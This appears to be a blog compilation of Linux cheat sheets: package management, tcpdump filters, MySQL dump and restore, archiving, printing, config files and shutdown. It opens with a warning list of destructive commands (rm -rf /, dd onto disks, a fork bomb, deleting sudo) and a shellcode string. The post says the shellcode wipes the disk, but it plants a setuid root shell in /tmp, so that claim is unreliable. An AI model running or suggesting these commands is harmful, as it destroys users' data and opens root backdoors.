Linux lethal commands

In this post I will collect all commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, can freeze or hang up running system.

NEVER RUN THESE COMMANDS IN LINUX BOX CLI!

Even if somebody advises you in forum/im to do it.

1. Any of these commands will erase everything from your home directory, root or just will clear up whole disk:

  • sudo rm -rf /
  • rm -rf .*
  • dd if=/dev/zero of=/dev/sda
  • mkfs.ext3 /dev/hda
  • whatever > /dev/hda
  • cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
  • find -type f -mtime +30 -exec mv {} /dev/null ;
  • mv ~ /dev/null
  • mv / /dev/null

2. Causes kernel panic or freezes Linux box:

  • dd if=/dev/random of=/dev/port
  • :(){:|:&};: #also known as fork bomb

3. This one does the same as “rm -rf /”:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

4. This one will prevent you from executing commands with root rights:

rm -f /usr/bin/sudo;rm -f /bin/su

If you know any other commands that can damage running Linux system or pose fatal problem to system administrators — just comment it here so I could update this post. Thanks.

Using RPM and dpkg

The /bin/rpm program on Red Hat and derivitives and the /usr/bin/dpkg on
Debian and derivitives are used to control the management of packages.
• Remove a package
# rpm -e <package-name>
# dpkg -r <package-name>
• List contents of entire package
# rpm -qvl <package-name.rpm>
# dpkg -c <package-name.deb>
• List all installed packages with info about each
# rpm -qvia
# dpkg -l
• List contents of a package
# rpm -qvpl <package-name.rpm>
# dpkg -c <package-name.deb>
• Print information about a package
# rpm -qpi <package-name.rpm>
# dpkg -I <package-name.deb>
• Verify package characteristics (basic integrity check)
# rpm -Va
# debsums -a
• Determine to which package a file belongs
# rpm -qf </path/to/file>
# dpkg -S </path/to/file>
• Install new package
# rpm -Uvh <package-name.rpm>
# dpkg -i <package-name.deb>

TCPDUMP

Command Line Options

-A Print frame payload in ASCII
-c <count> Exit after capturing count packets
-D List available interfaces
-e Print link-level headers
-F <file> Use file as the filter expression
-G <n> Rotate the dump file every n seconds
-i <iface> Specifies the capture interface
-K Don’t verify TCP checksums
-L List data link types for the interface
-n Don’t convert addresses to names
-p Don’t capture in promiscuous mode
-q Quick output
-r <file> Read packets from file
-s <len> Capture up to len bytes per packet
-S Print absolute TCP sequence numbers
-t Don’t print timestamps
-v[v[v]] Print more verbose output
-w <file> Write captured packets to file
-x Print frame payload in hex
-X Print frame payload in hex and ASCII
-y <type> Specify the data link type
-Z <user> Drop privileges from root to user

Capture Filter Primitives

[src|dst] host <host> Matches a host as the IP source, destination, or either
ether [src|dst] host <ehost> Matches a host as the Ethernet source, destination, or either
gateway host <host> Matches packets which used host as a gateway
[src|dst] net <network>/<len> Matches packets to or from an endpoint residing in network
[tcp|udp] [src|dst] port <port> Matches TCP or UDP packets sent to/from port
[tcp|udp] [src|dst] portrange <p1>-<p2> Matches TCP or UDP packets to/from a port in the given range
less <length> Matches packets less than or equal to length
greater <length> Matches packets greater than or equal to length
(ether|ip|ip6) proto <protocol> Matches an Ethernet, IPv4, or IPv6 protocol
(ether|ip) broadcast Matches Ethernet or IPv4 broadcasts
(ether|ip|ip6) multicast Matches Ethernet, IPv4, or IPv6 multicasts
type (mgt|ctl|data) [subtype <subtype>] Matches 802.11 frames based on type and optional subtype
vlan [<vlan>] Matches 802.1Q frames, optionally with a VLAN ID of vlan
mpls [<label>] Matches MPLS packets, optionally with a label of label
<expr> <relop> <expr> Matches packets by an arbitrary expression

Protocols

ether
fddi
icmp

ip

ip6

link
ppp
radio

rarp

slip
tcp
tr
udp
wlan

TCP Flags

tcp-urg tcp-rst
tcp-ack tcp-syn
tcp-psh tcp-fin

Modifiers

! or not
&& or and
|| or or

Examples

udp dst port not 53
host 10.0.0.1 && host 10.0.0.2
tcp dst port 80 or 8080
UDP not bound for port 53
Traffic between these hosts
Packets to either TCP port

ICMP Types

icmp-echoreply icmp-routeradvert icmp-tstampreply
icmp-unreach icmp-routersolicit icmp-ireq
icmp-sourcequench icmp-timxceed icmp-ireqreply
icmp-redirect icmp-paramprob icmp-maskreq
icmp-echo icmp-tstamp icmp-maskreply

important mysql command, backup, dump restore

Connest to mysql server

mysql -u USERNAME -h ‘HOST_IP’ -p

enter password – here

mysql> show databases;

mysql> use DATABASE_NAME;

mysql> your query here. 🙂

Dumping a mySQL to a sql file

mysqldump -l --opt databasename > /root/file/location/filename.sql  -u user --password=whateverthepass 

Importing mySQL dump file

mysql databasename < /root/file/location/filename.sql -u user --password=whateverthepass 

Copying Entire Folder of Files

cp - Ru /root/file/location/* /where/it/should/go --reply=yes 

Making a tgz archive of an entire folder for FTP export

tar zcf localfolder.tgz localfolder/ 

Copying an entire folder to another server

tar zcf - localfolder/  | ssh 192.1.1.1 "cd folder/to/copy/to; tar zpxvf -" 

If you want to extract one file from the .tar.gz file use

gzip -dc file.tar.gz | tar xf - pathname/filename
The pathname and filename should be exactly as given in the .tar.gz file. If you want more than one file append their names, again include pathname, at the end of the command. 

Printing linux commands

/etc/rc.d/init.d/lpd start Start the print daemon
/etc/rc.d/init.d/lpd stop Stop the print daemon
/etc/rc.d/init.d/lpd
status
Display status of the print daemon
lpq Display jobs in print queue
lprm Remove jobs from queue
lpr Print a file
lpc Printer control tool
man subject | lpr Print the manual page called subject
as plain text
man -t subject | lpr Print the manual page called subject
as Postscript output
printtool Start X printer setup interface

Configuration files and what they do

/etc/profile System wide environment variables for
all users.
/etc/fstab List of devices and their associated mount
points. Edit this file to add cdroms, DOS
partitions and floppy drives at startup.
/etc/motd Message of the day broadcast to all users
at login.
etc/rc.d/rc.local Bash script that is executed at the end of
login process. Similar to autoexec.bat in
DOS.
/etc/HOSTNAME Conatins full hostname including domain.
/etc/cron.* There are 4 directories that automatically
execute all scripts within the directory at
intervals of hour, day, week or month.
/etc/hosts A list of all know host names and IP
addresses on the machine.
/etc/httpd/conf Paramters for the Apache web server
/etc/inittab Specifies the run level that the machine
should boot into.
/etc/resolv.conf Defines IP addresses of DNS servers.
/etc/smb.conf Config file for the SAMBA server. Allows
file and print sharing with Microsoft
clients.
/etc/X11/XF86Confi
g
Config file for X-Windows.
~/.xinitrc Defines the windows manager loaded by
X. ~ refers to user’s home directory.

Installing software for Linux

rpm -ihv name.rpm Install the rpm package called name
rpm -Uhv name.rpm Upgrade the rpm package called
name
rpm -e package Delete the rpm package called
package
rpm -l package List the files in the package called
package
rpm -ql package List the files and state the installed
version of the package called
package
rpm -i –force package Reinstall the rpm package called
name having deleted parts of it (not
deleting using rpm -e)
tar -zxvf archive.tar.gz or
tar -zxvf archive.tgz
Decompress the files contained in
the zipped and tarred archive called
archive
./configure Execute the script preparing the
installed files for compiling

Accessing & mounting file systems

mount -t iso9660 /dev/cdrom
/mnt/cdrom
Mount the device cdrom
and call it cdrom under the
/mnt directory
mount -t msdos /dev/hdd
/mnt/ddrive
Mount hard disk “d” as a
msdos file system and call
it ddrive under the /mnt
directory
mount -t vfat /dev/hda1
/mnt/cdrive
Mount hard disk “a” as a
VFAT file system and call it
cdrive under the /mnt
directory
umount /mnt/cdrom Unmount the cdrom

Linux machine Starting, Stopping and restart

shutdown -h now Shutdown the system now and do not
reboot
halt Stop all processes – same as above
shutdown -r 5 Shutdown the system in 5 minutes and
reboot

shutdown -r now Shutdown the system now and reboot

shutdown -r -F now   Force fsck on reboot.

shutdown -r -f now   skip fsck on reboot.

reboot Stop all processes and then reboot – same
as above
startx Start the X system